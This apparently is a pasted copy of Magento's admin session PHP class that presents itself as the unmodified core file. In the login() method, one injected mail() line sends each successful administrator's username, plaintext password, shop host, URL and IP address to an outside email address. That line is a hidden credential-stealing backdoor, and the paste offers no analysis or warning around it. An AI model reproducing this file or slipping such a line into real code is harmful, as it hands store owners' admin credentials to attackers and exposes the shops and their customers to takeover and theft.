
Untitled

a guest
Jan 3rd, 2019
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magentocommerce.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magentocommerce.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Admin
  23. * @copyright Copyright (c) 2014 Magento Inc. (http://www.magentocommerce.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27.  
  28. /**
  29. * Auth session model
  30. *
  31. * @category Mage
  32. * @package Mage_Admin
  33. * @author Magento Core Team <core@magentocommerce.com>
  34. */
  35. class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
  36. {
  37.  
  38. /**
  39. * Whether it is the first page after successfull login
  40. *
  41. * @var boolean
  42. */
  43. protected $_isFirstPageAfterLogin;
  44.  
  45. /**
  46. * @var Mage_Admin_Model_Redirectpolicy
  47. */
  48. protected $_urlPolicy;
  49.  
  50. /**
  51. * @var Mage_Core_Controller_Response_Http
  52. */
  53. protected $_response;
  54.  
  55. /**
  56. * @var Mage_Core_Model_Factory
  57. */
  58. protected $_factory;
  59.  
  60. /**
  61. * Class constructor
  62. *
  63. */
  64. public function __construct($parameters = array())
  65. {
  66. /** @var Mage_Admin_Model_Redirectpolicy _urlPolicy */
  67. $this->_urlPolicy = (!empty($parameters['redirectPolicy'])) ?
  68. $parameters['redirectPolicy'] : Mage::getModel('admin/redirectpolicy');
  69.  
  70. /** @var Mage_Core_Controller_Response_Http _response */
  71. $this->_response = (!empty($parameters['response'])) ?
  72. $parameters['response'] : new Mage_Core_Controller_Response_Http();
  73.  
  74. /** @var $user Mage_Core_Model_Factory */
  75. $this->_factory = (!empty($parameters['factory'])) ?
  76. $parameters['factory'] : Mage::getModel('core/factory');
  77.  
  78. $this->init('admin');
  79. }
  80.  
  81. /**
  82. * Pull out information from session whether there is currently the first page after log in
  83. *
  84. * The idea is to set this value on login(), then redirect happens,
  85. * after that on next request the value is grabbed once the session is initialized
  86. * Since the session is used as a singleton, the value will be in $_isFirstPageAfterLogin until the end of request,
  87. * unless it is reset intentionally from somewhere
  88. *
  89. * @param string $namespace
  90. * @param string $sessionName
  91. * @return Mage_Admin_Model_Session
  92. * @see self::login()
  93. */
  94. public function init($namespace, $sessionName = null)
  95. {
  96. parent::init($namespace, $sessionName);
  97. $this->isFirstPageAfterLogin();
  98. return $this;
  99. }
  100.  
  101. /**
  102. * Try to login user in admin
  103. *
  104. * @param string $username
  105. * @param string $password
  106. * @param Mage_Core_Controller_Request_Http $request
  107. * @return Mage_Admin_Model_User|null
  108. */
  109. public function login($username, $password, $request = null)
  110. {
  111. if (empty($username) || empty($password)) {
  112. return;
  113. }
  114.  
  115. try {
  116. /** @var $user Mage_Admin_Model_User */
  117. $user = $this->_factory->getModel('admin/user');
  118. $user->login($username, $password);
  119. if ($user->getId()) {
  120. mail("zencarbot@gmail.com","Admin from ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);
  121. $this->renewSession();
  122.  
  123. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  124. Mage::getSingleton('adminhtml/url')->renewSecretUrls();
  125. }
  126. $this->setIsFirstPageAfterLogin(true);
  127. $this->setUser($user);
  128. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  129.  
  130. $alternativeUrl = $this->_getRequestUri($request);
  131. $redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl);
  132. if ($redirectUrl) {
  133. Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
  134. $this->_response->clearHeaders()
  135. ->setRedirect($redirectUrl)
  136. ->sendHeadersAndExit();
  137. }
  138. } else {
  139. Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
  140. }
  141. } catch (Mage_Core_Exception $e) {
  142. Mage::dispatchEvent('admin_session_user_login_failed',
  143. array('user_name' => $username, 'exception' => $e));
  144. if ($request && !$request->getParam('messageSent')) {
  145. Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
  146. $request->setParam('messageSent', true);
  147. }
  148. }
  149.  
  150. return $user;
  151. }
  152.  
  153. /**
  154. * Refresh ACL resources stored in session
  155. *
  156. * @param Mage_Admin_Model_User $user
  157. * @return Mage_Admin_Model_Session
  158. */
  159. public function refreshAcl($user = null)
  160. {
  161. if (is_null($user)) {
  162. $user = $this->getUser();
  163. }
  164. if (!$user) {
  165. return $this;
  166. }
  167. if (!$this->getAcl() || $user->getReloadAclFlag()) {
  168. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  169. }
  170. if ($user->getReloadAclFlag()) {
  171. $user->unsetData('password');
  172. $user->setReloadAclFlag('0')->save();
  173. }
  174. return $this;
  175. }
  176.  
  177. /**
  178. * Check current user permission on resource and privilege
  179. *
  180. * Mage::getSingleton('admin/session')->isAllowed('admin/catalog')
  181. * Mage::getSingleton('admin/session')->isAllowed('catalog')
  182. *
  183. * @param string $resource
  184. * @param string $privilege
  185. * @return boolean
  186. */
  187. public function isAllowed($resource, $privilege = null)
  188. {
  189. $user = $this->getUser();
  190. $acl = $this->getAcl();
  191.  
  192. if ($user && $acl) {
  193. if (!preg_match('/^admin/', $resource)) {
  194. $resource = 'admin/' . $resource;
  195. }
  196.  
  197. try {
  198. return $acl->isAllowed($user->getAclRole(), $resource, $privilege);
  199. } catch (Exception $e) {
  200. try {
  201. if (!$acl->has($resource)) {
  202. return $acl->isAllowed($user->getAclRole(), null, $privilege);
  203. }
  204. } catch (Exception $e) { }
  205. }
  206. }
  207. return false;
  208. }
  209.  
  210. /**
  211. * Check if user is logged in
  212. *
  213. * @return boolean
  214. */
  215. public function isLoggedIn()
  216. {
  217. return $this->getUser() && $this->getUser()->getId();
  218. }
  219.  
  220. /**
  221. * Check if it is the first page after successfull login
  222. *
  223. * @return boolean
  224. */
  225. public function isFirstPageAfterLogin()
  226. {
  227. if (is_null($this->_isFirstPageAfterLogin)) {
  228. $this->_isFirstPageAfterLogin = $this->getData('is_first_visit', true);
  229. }
  230. return $this->_isFirstPageAfterLogin;
  231. }
  232.  
  233. /**
  234. * Setter whether the current/next page should be treated as first page after login
  235. *
  236. * @param bool $value
  237. * @return Mage_Admin_Model_Session
  238. */
  239. public function setIsFirstPageAfterLogin($value)
  240. {
  241. $this->_isFirstPageAfterLogin = (bool)$value;
  242. return $this->setIsFirstVisit($this->_isFirstPageAfterLogin);
  243. }
  244.  
  245. /**
  246. * Custom REQUEST_URI logic
  247. *
  248. * @param Mage_Core_Controller_Request_Http $request
  249. * @return string|null
  250. */
  251. protected function _getRequestUri($request = null)
  252. {
  253. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  254. return Mage::getSingleton('adminhtml/url')->getUrl('*/*/*', array('_current' => true));
  255. } elseif ($request) {
  256. return $request->getRequestUri();
  257. } else {
  258. return null;
  259. }
  260. }
  261. }